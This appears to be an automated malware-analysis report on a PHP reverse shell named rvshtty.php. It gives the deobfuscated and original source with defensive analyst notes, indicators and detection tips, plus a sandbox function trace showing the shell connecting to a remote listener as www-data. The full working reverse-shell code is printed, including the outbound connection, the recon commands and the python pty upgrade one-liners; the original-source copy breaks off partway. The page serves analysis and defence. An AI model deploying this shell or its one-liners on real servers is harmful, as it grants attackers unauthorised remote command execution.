PHP Malware Analysis

rvshtty.php

md5: 6fa741894b8d56f4c2dfab39735cd721


Deobfuscated PHP code

<?php

// AUTHOR: trhacknon
//
// Analyst notes (malware review):
//   This is a PHP reverse shell ("rvshtty"). It opens an OUTBOUND TCP
//   connection from the web server to a remote listener, spawns /bin/sh via
//   proc_open(), and relays raw bytes between the socket and the shell's
//   stdin/stdout/stderr until either side reaches EOF. The channel has no
//   authentication and no encryption: whatever the listener sends is handed
//   to the shell unmodified. Everything runs with the privileges of the PHP
//   worker (the trace on this page shows uid=33 www-data).
//   Network indicators: plaintext status banners ("[+] CONNECTION ESTABLISHED",
//   "[*] ATTEMPTING TO SPAWN SHELL", ...) are written to the listener before
//   any shell output, followed by the output of `uname -a`, `w` and `id`.
//
// CHANGE THE FOLLOWING PARAMS AS NEEDED:
//---------------------------------------------------------------
$addr = 'vmi850151.contaboserver.net';
# listener (C2) hostname -- the original "loopback for testing" remark is
# stale: this is a remote host, not 127.0.0.1. Treat host:port as an IOC.
$port = 1337;
# listener TCP port
$timeout = 20.0;
# fsockopen() connect timeout in seconds
$shell = 'uname -a; w; id; /bin/sh -i';
# command line handed to proc_open(): three recon commands (kernel/arch,
# logged-in users, identity) followed by an interactive /bin/sh
//---------------------------------------------------------------
// open a socket to connect to host
// (egress stage: an outbound connect from the web tier; proxy-only or
// deny-by-default egress on the web server blocks the shell here)
$socket = fsockopen($addr, $port, $errno, $errstr, $timeout);
// check if connection successful
// (this message is the only HTTP output the script produces on this path)
if (!$socket) {
    exit("UNABLE TO CONNECT TO HOST\n");
}
// notify host
fwrite($socket, "[+] CONNECTION ESTABLISHED\n");
// set socket to non-blocking
stream_set_blocking($socket, FALSE);
// file descriptors
// all three standard streams of the child are pipes owned by this script
$descriptorspec = array(
    0 => array("pipe", "r"),
    #stdin
    1 => array("pipe", "w"),
    #stdout
    2 => array("pipe", "w"),
    #stderr
);
fwrite($socket, "[*] ATTEMPTING TO SPAWN SHELL\n");
// get a shell
// proc_open() runs $shell through the system shell; the child inherits the
// PHP worker's uid/gid. Process-tree detection: a web-server/PHP worker
// with a child sh whose stdin/stdout/stderr are all pipes.
$process = proc_open($shell, $descriptorspec, $pipes);
// make sure we have a shell
if (!is_resource($process)) {
    fwrite($socket, "[-] FAILED TO SPAWN A SHELL ON TARGET\n");
    exit("FAILED TO SPAWN SHELL\n");
}
// notify host
fwrite($socket, "[+] SHELL SPAWNED SUCCESSFULLY\n");
// set data streams to non-blocking so they
// don't wait for data when being read
stream_set_blocking($pipes[0], FALSE);
stream_set_blocking($pipes[1], FALSE);
stream_set_blocking($pipes[2], FALSE);
//attempt to stablize shell
// PTY upgrade: a python `pty.spawn()` one-liner is typed into the shell's
// stdin. Each cmdExists() probe is a separate shell_exec("which ...") child
// (visible in the trace as `which python`, `which python3`, `which bash`).
// The one-liner is written WITHOUT a trailing newline, so the shell does not
// run it until the operator sends one -- hence the "HIT 'ENTER'" banner.
fwrite($socket, "[*] ATTEMPTING TO STABILIZE SHELL\n");
if (cmdExists("python") && cmdExists("bash")) {
    fwrite($pipes[0], "python -c 'import pty; pty.spawn(\"/bin/bash\")'");
    fwrite($socket, "[+] SHELL STABILIZED :: HIT 'ENTER'\n");
} elseif (cmdExists("python3") && cmdExists("bash")) {
    fwrite($pipes[0], "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'");
    fwrite($socket, "[+] SHELL STABILIZED :: HIT 'ENTER'\n");
} elseif (cmdExists("python")) {
    fwrite($pipes[0], "python -c 'import pty; pty.spawn(\"/bin/sh\")'");
    fwrite($socket, "[+] SHELL STABILIZED :: HIT 'ENTER'\n");
} elseif (cmdExists("python3")) {
    fwrite($pipes[0], "python3 -c 'import pty; pty.spawn(\"/bin/sh\")'");
    fwrite($socket, "[+] SHELL STABILIZED :: HIT 'ENTER'\n");
} else {
    fwrite($socket, "[-] UNABLE TO STABILIZE SHELL\n[-] TTY FUNCTIONALITY IS NOT AVAILABLE\n");
}
// now we've got a reverse shell.
// handle io:
// Relay loop. stream_select() with a NULL timeout blocks until at least one
// of the three streams is readable; at most 1500 bytes are copied per
// iteration in each direction (socket -> shell stdin, shell stdout/stderr ->
// socket). Nothing is filtered or validated: in the traced run an HTTP 400
// response from the listener was forwarded verbatim into the shell's stdin.
while (TRUE) {
    // check our connection to the host:
    // we've lost our shell if we've
    // reached EOF on the socket or
    // the stdout pipe (EOF on stderr alone does not end the loop)
    if (feof($socket) || feof($pipes[1])) {
        break;
    }
    // keeps track of the state of incoming
    // data from the host, stdout, and stderr
    // (stream_select() rewrites this array in place, leaving only the
    // streams that are ready to read)
    $traffic = array($socket, $pipes[1], $pipes[2]);
    // dummy variables because we only care about traffic
    $write = null;
    $except = null;
    // wait for traffic
    // (the ready-stream count is stored but never used)
    $changedStreams = stream_select($traffic, $write, $except, null);
    // incoming commands from host:
    if (in_array($socket, $traffic)) {
        // get incomming command and send to stdin
        $command = fread($socket, 1500);
        fwrite($pipes[0], $command);
    }
    // outgoing messages from stdout
    if (in_array($pipes[1], $traffic)) {
        // get outgoing message and send to host
        $message = fread($pipes[1], 1500);
        fwrite($socket, $message);
    }
    // outgoing messages from stderr
    if (in_array($pipes[2], $traffic)) {
        // get outgoing message and send to host
        $message = fread($pipes[2], 1500);
        fwrite($socket, $message);
    }
}
// clean up nice
// (proc_close() returns the child's exit status; 127 in the traced run)
fclose($socket);
proc_close($process);
//check if a command is runnable on the system
// Probes PATH with `which` through shell_exec(). Returns false when the
// probe produced no output (shell_exec() yields NULL for empty output, as
// the trace shows for `which python`) and true otherwise -- it does not
// distinguish "not installed" from "which itself unavailable".
// $cmd is interpolated into the shell command line unescaped; in this file
// it only ever receives the literals "python", "python3" and "bash".
// Declared after its first use, which PHP permits for an unconditional
// top-level function.
function cmdExists($cmd)
{
    // attempt to execute, if returns false
    // we know we can't run that command
    if (!shell_exec("which {$cmd}")) {
        return false;
    }
    return true;
}

Execution traces (Xdebug-style function trace of a sandboxed run: the script executed as www-data from /var/www/html/uploads/, connected to vmi850151.contaboserver.net:1337, and the listener's reply — an HTTP 400 from a Python websockets server — was relayed unmodified into the spawned shell's stdin)

data/traces/6fa741894b8d56f4c2dfab39735cd721_trace-1676252849.0219.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:47:54.919798]
1	0	1	0.000208	393528
1	3	0	0.000376	414408	{main}	1		/var/www/html/uploads/rvshtty.php	0	0
1		A						/var/www/html/uploads/rvshtty.php	7	$addr = 'vmi850151.contaboserver.net'
1		A						/var/www/html/uploads/rvshtty.php	8	$port = 1337
1		A						/var/www/html/uploads/rvshtty.php	9	$timeout = 20
1		A						/var/www/html/uploads/rvshtty.php	10	$shell = 'uname -a; w; id; /bin/sh -i'
2	4	0	0.000445	414456	fsockopen	0		/var/www/html/uploads/rvshtty.php	15	5	'vmi850151.contaboserver.net'	1337	NULL	NULL	20
2	4	1	0.275933	415064
2	4	R			resource(3) of type (stream)
1		A						/var/www/html/uploads/rvshtty.php	15	$socket = resource(3) of type (stream)
2	5	0	0.275992	414896	fwrite	0		/var/www/html/uploads/rvshtty.php	25	2	resource(3) of type (stream)	'[+] CONNECTION ESTABLISHED\n'
2	5	1	0.276029	414960
2	5	R			27
2	6	0	0.276045	414896	stream_set_blocking	0		/var/www/html/uploads/rvshtty.php	29	2	resource(3) of type (stream)	FALSE
2	6	1	0.276063	414960
2	6	R			TRUE
1		A						/var/www/html/uploads/rvshtty.php	35	$descriptorspec = [0 => [0 => 'pipe', 1 => 'r'], 1 => [0 => 'pipe', 1 => 'w'], 2 => [0 => 'pipe', 1 => 'w']]
2	7	0	0.276147	414896	fwrite	0		/var/www/html/uploads/rvshtty.php	40	2	resource(3) of type (stream)	'[*] ATTEMPTING TO SPAWN SHELL\n'
2	7	1	0.276195	414960
2	7	R			30
2	8	0	0.276237	414920	proc_open	0		/var/www/html/uploads/rvshtty.php	43	3	'uname -a; w; id; /bin/sh -i'	[0 => [0 => 'pipe', 1 => 'r'], 1 => [0 => 'pipe', 1 => 'w'], 2 => [0 => 'pipe', 1 => 'w']]	NULL
2	8	1	0.277217	416848
2	8	R			resource(7) of type (process)
1		A						/var/www/html/uploads/rvshtty.php	43	$process = resource(7) of type (process)
2	9	0	0.277364	416744	fwrite	0		/var/www/html/uploads/rvshtty.php	54	2	resource(3) of type (stream)	'[+] SHELL SPAWNED SUCCESSFULLY\n'
2	9	1	0.277402	416808
2	9	R			31
2	10	0	0.277433	416744	stream_set_blocking	0		/var/www/html/uploads/rvshtty.php	59	2	resource(4) of type (stream)	FALSE
2	10	1	0.277450	416808
2	10	R			TRUE
2	11	0	0.277470	416744	stream_set_blocking	0		/var/www/html/uploads/rvshtty.php	60	2	resource(5) of type (stream)	FALSE
2	11	1	0.277495	416808
2	11	R			TRUE
2	12	0	0.277510	416744	stream_set_blocking	0		/var/www/html/uploads/rvshtty.php	61	2	resource(6) of type (stream)	FALSE
2	12	1	0.277526	416808
2	12	R			TRUE
2	13	0	0.277538	416744	fwrite	0		/var/www/html/uploads/rvshtty.php	65	2	resource(3) of type (stream)	'[*] ATTEMPTING TO STABILIZE SHELL\n'
2	13	1	0.277558	416808
2	13	R			34
2	14	0	0.277576	416744	cmdExists	1		/var/www/html/uploads/rvshtty.php	67	1	'python'
3	15	0	0.277595	416784	shell_exec	0		/var/www/html/uploads/rvshtty.php	155	1	'which python'
3	15	1	0.279025	417136
3	15	R			NULL
2	14	1	0.279048	417064
2	14	R			FALSE
2	16	0	0.279062	417064	cmdExists	1		/var/www/html/uploads/rvshtty.php	72	1	'python3'
3	17	0	0.279077	417104	shell_exec	0		/var/www/html/uploads/rvshtty.php	155	1	'which python3'
3	17	1	0.280416	417184
3	17	R			'/usr/bin/python3\n'
2	16	1	0.280457	417064
2	16	R			TRUE
2	18	0	0.280471	417064	cmdExists	1		/var/www/html/uploads/rvshtty.php	72	1	'bash'
3	19	0	0.280484	417104	shell_exec	0		/var/www/html/uploads/rvshtty.php	155	1	'which bash'
3	19	1	0.281748	417176
3	19	R			'/usr/bin/bash\n'
2	18	1	0.281785	417064
2	18	R			TRUE
2	20	0	0.281799	417064	fwrite	0		/var/www/html/uploads/rvshtty.php	74	2	resource(4) of type (stream)	'python3 -c \'import pty; pty.spawn("/bin/bash")\''
2	20	1	0.281818	417128
2	20	R			47
2	21	0	0.281831	417064	fwrite	0		/var/www/html/uploads/rvshtty.php	75	2	resource(3) of type (stream)	'[+] SHELL STABILIZED :: HIT \'ENTER\'\n'
2	21	1	0.281865	417128
2	21	R			36
2	22	0	0.281896	417064	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(3) of type (stream)
2	22	1	0.281912	417096
2	22	R			FALSE
2	23	0	0.281925	417064	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(5) of type (stream)
2	23	1	0.281945	417096
2	23	R			FALSE
1		A						/var/www/html/uploads/rvshtty.php	110	$traffic = [0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]
1		A						/var/www/html/uploads/rvshtty.php	112	$write = NULL
1		A						/var/www/html/uploads/rvshtty.php	112	$except = NULL
2	24	0	0.282009	417512	stream_select	0		/var/www/html/uploads/rvshtty.php	114	4	[0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]	NULL	NULL	NULL
2	24	1	0.282041	417664
2	24	R			1
1		A						/var/www/html/uploads/rvshtty.php	114	$changedStreams = 1
2	25	0	0.282079	417512	in_array	0		/var/www/html/uploads/rvshtty.php	118	2	resource(3) of type (stream)	[1 => resource(5) of type (stream)]
2	25	1	0.282096	417584
2	25	R			FALSE
2	26	0	0.282109	417512	in_array	0		/var/www/html/uploads/rvshtty.php	127	2	resource(5) of type (stream)	[1 => resource(5) of type (stream)]
2	26	1	0.282123	417584
2	26	R			TRUE
2	27	0	0.282135	417512	fread	0		/var/www/html/uploads/rvshtty.php	130	2	resource(5) of type (stream)	1500
2	27	1	0.282152	425928
2	27	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux\n'
1		A						/var/www/html/uploads/rvshtty.php	130	$message = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux\n'
2	28	0	0.282190	425864	fwrite	0		/var/www/html/uploads/rvshtty.php	131	2	resource(3) of type (stream)	'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux\n'
2	28	1	0.282222	425928
2	28	R			107
2	29	0	0.282236	425864	in_array	0		/var/www/html/uploads/rvshtty.php	136	2	resource(6) of type (stream)	[1 => resource(5) of type (stream)]
2	29	1	0.282267	425936
2	29	R			FALSE
2	30	0	0.282281	425864	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(3) of type (stream)
2	30	1	0.282300	425896
2	30	R			FALSE
2	31	0	0.282319	425864	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(5) of type (stream)
2	31	1	0.282333	425896
2	31	R			FALSE
1		A						/var/www/html/uploads/rvshtty.php	110	$traffic = [0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]
1		A						/var/www/html/uploads/rvshtty.php	112	$write = NULL
1		A						/var/www/html/uploads/rvshtty.php	112	$except = NULL
2	32	0	0.282381	425864	stream_select	0		/var/www/html/uploads/rvshtty.php	114	4	[0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]	NULL	NULL	NULL
2	32	1	0.285124	426016
2	32	R			1
1		A						/var/www/html/uploads/rvshtty.php	114	$changedStreams = 1
2	33	0	0.285159	425864	in_array	0		/var/www/html/uploads/rvshtty.php	118	2	resource(3) of type (stream)	[1 => resource(5) of type (stream)]
2	33	1	0.285177	425936
2	33	R			FALSE
2	34	0	0.285190	425864	in_array	0		/var/www/html/uploads/rvshtty.php	127	2	resource(5) of type (stream)	[1 => resource(5) of type (stream)]
2	34	1	0.285205	425936
2	34	R			TRUE
2	35	0	0.285218	425864	fread	0		/var/www/html/uploads/rvshtty.php	130	2	resource(5) of type (stream)	1500
2	35	1	0.285253	426312
2	35	R			' 20:47:29 up 12:45,  2 users,  load average: 1.08, 1.11, 1.09\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\nosboxes  tty2     tty2             05:52   11days  0.01s  0.01s /usr/libexec/gnome-session-binary --session=ubuntu\nosboxes  pts/6    -                12:44    7:15m  0.25s  0.09s sudo vim /etc/php/7.2/apache2/php.ini\n'
1		A						/var/www/html/uploads/rvshtty.php	130	$message = ' 20:47:29 up 12:45,  2 users,  load average: 1.08, 1.11, 1.09\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\nosboxes  tty2     tty2             05:52   11days  0.01s  0.01s /usr/libexec/gnome-session-binary --session=ubuntu\nosboxes  pts/6    -                12:44    7:15m  0.25s  0.09s sudo vim /etc/php/7.2/apache2/php.ini\n'
2	36	0	0.285339	426088	fwrite	0		/var/www/html/uploads/rvshtty.php	131	2	resource(3) of type (stream)	' 20:47:29 up 12:45,  2 users,  load average: 1.08, 1.11, 1.09\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\nosboxes  tty2     tty2             05:52   11days  0.01s  0.01s /usr/libexec/gnome-session-binary --session=ubuntu\nosboxes  pts/6    -                12:44    7:15m  0.25s  0.09s sudo vim /etc/php/7.2/apache2/php.ini\n'
2	36	1	0.285393	426152
2	36	R			347
2	37	0	0.285424	426088	in_array	0		/var/www/html/uploads/rvshtty.php	136	2	resource(6) of type (stream)	[1 => resource(5) of type (stream)]
2	37	1	0.285439	426160
2	37	R			FALSE
2	38	0	0.285452	426088	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(3) of type (stream)
2	38	1	0.285471	426120
2	38	R			FALSE
2	39	0	0.285491	426088	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(5) of type (stream)
2	39	1	0.285522	426120
2	39	R			FALSE
1		A						/var/www/html/uploads/rvshtty.php	110	$traffic = [0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]
1		A						/var/www/html/uploads/rvshtty.php	112	$write = NULL
1		A						/var/www/html/uploads/rvshtty.php	112	$except = NULL
2	40	0	0.285572	426088	stream_select	0		/var/www/html/uploads/rvshtty.php	114	4	[0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]	NULL	NULL	NULL
2	40	1	0.286032	426240
2	40	R			1
1		A						/var/www/html/uploads/rvshtty.php	114	$changedStreams = 1
2	41	0	0.286088	426088	in_array	0		/var/www/html/uploads/rvshtty.php	118	2	resource(3) of type (stream)	[1 => resource(5) of type (stream)]
2	41	1	0.286119	426160
2	41	R			FALSE
2	42	0	0.286148	426088	in_array	0		/var/www/html/uploads/rvshtty.php	127	2	resource(5) of type (stream)	[1 => resource(5) of type (stream)]
2	42	1	0.286164	426160
2	42	R			TRUE
2	43	0	0.286177	426088	fread	0		/var/www/html/uploads/rvshtty.php	130	2	resource(5) of type (stream)	1500
2	43	1	0.286206	426232
2	43	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
1		A						/var/www/html/uploads/rvshtty.php	130	$message = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
2	44	0	0.286254	425784	fwrite	0		/var/www/html/uploads/rvshtty.php	131	2	resource(3) of type (stream)	'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
2	44	1	0.286315	425848
2	44	R			54
2	45	0	0.286330	425784	in_array	0		/var/www/html/uploads/rvshtty.php	136	2	resource(6) of type (stream)	[1 => resource(5) of type (stream)]
2	45	1	0.286346	425856
2	45	R			FALSE
2	46	0	0.286358	425784	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(3) of type (stream)
2	46	1	0.286372	425816
2	46	R			FALSE
2	47	0	0.286390	425784	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(5) of type (stream)
2	47	1	0.286410	425816
2	47	R			FALSE
1		A						/var/www/html/uploads/rvshtty.php	110	$traffic = [0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]
1		A						/var/www/html/uploads/rvshtty.php	112	$write = NULL
1		A						/var/www/html/uploads/rvshtty.php	112	$except = NULL
2	48	0	0.286459	425784	stream_select	0		/var/www/html/uploads/rvshtty.php	114	4	[0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]	NULL	NULL	NULL
2	48	1	0.286701	425936
2	48	R			1
1		A						/var/www/html/uploads/rvshtty.php	114	$changedStreams = 1
2	49	0	0.286747	425784	in_array	0		/var/www/html/uploads/rvshtty.php	118	2	resource(3) of type (stream)	[2 => resource(6) of type (stream)]
2	49	1	0.286764	425856
2	49	R			FALSE
2	50	0	0.286777	425784	in_array	0		/var/www/html/uploads/rvshtty.php	127	2	resource(5) of type (stream)	[2 => resource(6) of type (stream)]
2	50	1	0.286792	425856
2	50	R			FALSE
2	51	0	0.286804	425784	in_array	0		/var/www/html/uploads/rvshtty.php	136	2	resource(6) of type (stream)	[2 => resource(6) of type (stream)]
2	51	1	0.286819	425856
2	51	R			TRUE
2	52	0	0.286831	425784	fread	0		/var/www/html/uploads/rvshtty.php	139	2	resource(6) of type (stream)	1500
2	52	1	0.286848	434120
2	52	R			'/bin/sh: 0: can\'t access tty; job control turned off\n$ '
1		A						/var/www/html/uploads/rvshtty.php	139	$message = '/bin/sh: 0: can\'t access tty; job control turned off\n$ '
2	53	0	0.286877	433976	fwrite	0		/var/www/html/uploads/rvshtty.php	140	2	resource(3) of type (stream)	'/bin/sh: 0: can\'t access tty; job control turned off\n$ '
2	53	1	0.286908	434040
2	53	R			55
2	54	0	0.286937	433976	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(3) of type (stream)
2	54	1	0.286951	434008
2	54	R			FALSE
2	55	0	0.286966	433976	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(5) of type (stream)
2	55	1	0.287000	434008
2	55	R			FALSE
1		A						/var/www/html/uploads/rvshtty.php	110	$traffic = [0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]
1		A						/var/www/html/uploads/rvshtty.php	112	$write = NULL
1		A						/var/www/html/uploads/rvshtty.php	112	$except = NULL
2	56	0	0.287081	433976	stream_select	0		/var/www/html/uploads/rvshtty.php	114	4	[0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]	NULL	NULL	NULL
2	56	1	0.382607	434128
2	56	R			1
1		A						/var/www/html/uploads/rvshtty.php	114	$changedStreams = 1
2	57	0	0.382678	433976	in_array	0		/var/www/html/uploads/rvshtty.php	118	2	resource(3) of type (stream)	[0 => resource(3) of type (stream)]
2	57	1	0.382698	434048
2	57	R			TRUE
2	58	0	0.382714	433976	fread	0		/var/www/html/uploads/rvshtty.php	121	2	resource(3) of type (stream)	1500
2	58	1	0.382737	442552
2	58	R			'HTTP/1.1 400 Bad Request\r\nDate: Mon, 13 Feb 2023 01:47:29 GMT\r\nServer: Python/3.10 websockets/10.2\r\nContent-Length: 77\r\nContent-Type: text/plain\r\nConnection: close\r\n\r\nFailed to open a WebSocket connection: did not receive a valid HTTP request.\n'
1		A						/var/www/html/uploads/rvshtty.php	121	$command = 'HTTP/1.1 400 Bad Request\r\nDate: Mon, 13 Feb 2023 01:47:29 GMT\r\nServer: Python/3.10 websockets/10.2\r\nContent-Length: 77\r\nContent-Type: text/plain\r\nConnection: close\r\n\r\nFailed to open a WebSocket connection: did not receive a valid HTTP request.\n'
2	59	0	0.382788	442488	fwrite	0		/var/www/html/uploads/rvshtty.php	122	2	resource(4) of type (stream)	'HTTP/1.1 400 Bad Request\r\nDate: Mon, 13 Feb 2023 01:47:29 GMT\r\nServer: Python/3.10 websockets/10.2\r\nContent-Length: 77\r\nContent-Type: text/plain\r\nConnection: close\r\n\r\nFailed to open a WebSocket connection: did not receive a valid HTTP request.\n'
2	59	1	0.382819	442552
2	59	R			244
2	60	0	0.382833	442488	in_array	0		/var/www/html/uploads/rvshtty.php	127	2	resource(5) of type (stream)	[0 => resource(3) of type (stream)]
2	60	1	0.382850	442560
2	60	R			FALSE
2	61	0	0.382863	442488	in_array	0		/var/www/html/uploads/rvshtty.php	136	2	resource(6) of type (stream)	[0 => resource(3) of type (stream)]
2	61	1	0.382878	442560
2	61	R			FALSE
2	62	0	0.382891	442488	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(3) of type (stream)
2	62	1	0.382907	442520
2	62	R			FALSE
2	63	0	0.382921	442488	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(5) of type (stream)
2	63	1	0.382934	442520
2	63	R			FALSE
1		A						/var/www/html/uploads/rvshtty.php	110	$traffic = [0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]
1		A						/var/www/html/uploads/rvshtty.php	112	$write = NULL
1		A						/var/www/html/uploads/rvshtty.php	112	$except = NULL
2	64	0	0.382982	442488	stream_select	0		/var/www/html/uploads/rvshtty.php	114	4	[0 => resource(3) of type (stream), 1 => resource(5) of type (stream), 2 => resource(6) of type (stream)]	NULL	NULL	NULL
2	64	1	0.383003	442640
2	64	R			1
1		A						/var/www/html/uploads/rvshtty.php	114	$changedStreams = 1
2	65	0	0.383026	442488	in_array	0		/var/www/html/uploads/rvshtty.php	118	2	resource(3) of type (stream)	[0 => resource(3) of type (stream)]
2	65	1	0.383041	442560
2	65	R			TRUE
2	66	0	0.383054	442488	fread	0		/var/www/html/uploads/rvshtty.php	121	2	resource(3) of type (stream)	1500
2	66	1	0.383070	442584
2	66	R			''
1		A						/var/www/html/uploads/rvshtty.php	121	$command = ''
2	67	0	0.383093	442200	fwrite	0		/var/www/html/uploads/rvshtty.php	122	2	resource(4) of type (stream)	''
2	67	1	0.383107	442264
2	67	R			0
2	68	0	0.383119	442200	in_array	0		/var/www/html/uploads/rvshtty.php	127	2	resource(5) of type (stream)	[0 => resource(3) of type (stream)]
2	68	1	0.383134	442272
2	68	R			FALSE
2	69	0	0.383147	442200	in_array	0		/var/www/html/uploads/rvshtty.php	136	2	resource(6) of type (stream)	[0 => resource(3) of type (stream)]
2	69	1	0.383162	442272
2	69	R			FALSE
2	70	0	0.383174	442200	feof	0		/var/www/html/uploads/rvshtty.php	103	1	resource(3) of type (stream)
2	70	1	0.383187	442232
2	70	R			TRUE
2	71	0	0.383201	442200	fclose	0		/var/www/html/uploads/rvshtty.php	146	1	resource(3) of type (stream)
2	71	1	0.383215	433624
2	71	R			TRUE
2	72	0	0.383228	433592	proc_close	0		/var/www/html/uploads/rvshtty.php	147	1	resource(7) of type (process)
2	72	1	0.469655	415888
2	72	R			127
1	3	1	0.469701	415856
			0.469770	318528
TRACE END   [2023-02-12 23:47:55.389395]


Generated HTML code (empty: the script only writes to the HTTP response on its two failure paths — connect failure and proc_open failure — and neither was reached in the traced run)

<html><head></head><body></body></html>

Original PHP code

<?php

    // AUTHOR: trhacknon
    //
    // Analyst notes (malware review):
    //   PHP reverse shell ("rvshtty"). Opens an OUTBOUND TCP connection from
    //   the web server to a remote listener, spawns /bin/sh via proc_open(),
    //   and relays raw bytes between the socket and the shell's
    //   stdin/stdout/stderr until either side reaches EOF. No authentication,
    //   no encryption: whatever the listener sends is handed to the shell
    //   unmodified. Runs with the PHP worker's privileges (www-data in the
    //   trace on this page). On the wire it sends plaintext banners such as
    //   "[+] CONNECTION ESTABLISHED" followed by `uname -a`, `w`, `id` output.

    // CHANGE THE FOLLOWING PARAMS AS NEEDED:
    //---------------------------------------------------------------
    $addr = 'vmi850151.contaboserver.net';   # listener (C2) host -- a remote host, not loopback; treat host:port as an IOC
    $port = 1337;          # listener TCP port
    $timeout = 20.0;       # fsockopen() connect timeout (seconds)
    $shell = 'uname -a; w; id; /bin/sh -i'; # recon commands, then an interactive /bin/sh
    //---------------------------------------------------------------


    // open a socket to connect to host
    // (egress stage: deny-by-default or proxy-only egress on the web tier
    // stops the shell here; the exit() message below is the only HTTP output)
    $socket = fsockopen($addr, $port, $errno, $errstr, $timeout);


    // check if connection successful
    if (!$socket) 
    {
        exit("UNABLE TO CONNECT TO HOST\n");
    }

    // notify host
    fwrite($socket, "[+] CONNECTION ESTABLISHED\n");


    // set socket to non-blocking
    stream_set_blocking($socket  , FALSE);


    // file descriptors
    // all three standard streams of the child are pipes owned by this script
    $descriptorspec = array 
    (
        0 => array( "pipe", "r" ),  #stdin
        1 => array( "pipe", "w" ),  #stdout
        2 => array( "pipe", "w" )   #stderr
    );

    fwrite($socket, "[*] ATTEMPTING TO SPAWN SHELL\n");

    // get a shell
    // proc_open() runs $shell through the system shell as a child of the PHP
    // worker. Process-tree detection: web-server/PHP worker -> sh with all
    // three standard streams as pipes.
    $process = proc_open($shell, $descriptorspec, $pipes);


    // make sure we have a shell
    if ( !is_resource($process) )
    {
        fwrite($socket, "[-] FAILED TO SPAWN A SHELL ON TARGET\n");
        exit("FAILED TO SPAWN SHELL\n");
    }

    // notify host
    fwrite($socket, "[+] SHELL SPAWNED SUCCESSFULLY\n");


    // set data streams to non-blocking so they
    // don't wait for data when being read
    stream_set_blocking($pipes[0], FALSE);
    stream_set_blocking($pipes[1], FALSE);
    stream_set_blocking($pipes[2], FALSE);


    //attempt to stablize shell
    // PTY upgrade: a python `pty.spawn()` one-liner is typed into the shell's
    // stdin. Each cmdExists() probe is a separate shell_exec("which ...")
    // child (trace: `which python`, `which python3`, `which bash`). The
    // one-liner carries NO trailing newline, so the shell does not run it
    // until the operator sends one -- hence the "HIT 'ENTER'" banner.
    fwrite($socket, "[*] ATTEMPTING TO STABILIZE SHELL\n");

    if ( cmdExists("python") && cmdExists("bash") )
    {
        fwrite($pipes[0], "python -c 'import pty; pty.spawn(\"/bin/bash\")'");
        fwrite($socket, "[+] SHELL STABILIZED :: HIT 'ENTER'\n");
    }
    elseif ( cmdExists("python3") && cmdExists("bash") )
    {
        fwrite($pipes[0], "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'");
        fwrite($socket, "[+] SHELL STABILIZED :: HIT 'ENTER'\n");
    }
    elseif ( cmdExists("python") )
    {
        fwrite($pipes[0], "python -c 'import pty; pty.spawn(\"/bin/sh\")'");
        fwrite($socket, "[+] SHELL STABILIZED :: HIT 'ENTER'\n");
    }
    elseif ( cmdExists("python3") )
    {
        fwrite($pipes[0], "python3 -c 'import pty; pty.spawn(\"/bin/sh\")'");
        fwrite($socket, "[+] SHELL STABILIZED :: HIT 'ENTER'\n");
    }
    else 
    {
        fwrite($socket, "[-] UNABLE TO STABILIZE SHELL\n[-] TTY FUNCTIONALITY IS NOT AVAILABLE\n");
    }



    // now we've got a reverse shell.
    // handle io:
    // Relay loop. stream_select() with a NULL timeout blocks until a stream
    // is readable; at most 1500 bytes are copied per iteration in each
    // direction (socket -> shell stdin, shell stdout/stderr -> socket).
    // Nothing is filtered: in the traced run an HTTP 400 response from the
    // listener was forwarded verbatim into the shell's stdin.
    while (TRUE) 
    {

        // check our connection to the host:
        // we've lost our shell if we've
        // reached EOF on the socket or
        // the stdout pipe (EOF on stderr alone does not end the loop)
        if ( feof($socket) || feof($pipes[1]) ) 
        {
            break;
        }

        // keeps track of the state of incoming
        // data from the host, stdout, and stderr
        // (stream_select() rewrites this array in place, leaving only the
        // streams that are ready to read)
        $traffic = array($socket, $pipes[1], $pipes[2]);
        // dummy variables because we only care about traffic
        $write = null; $except = null;
        // wait for traffic (the ready-stream count is stored but never used)
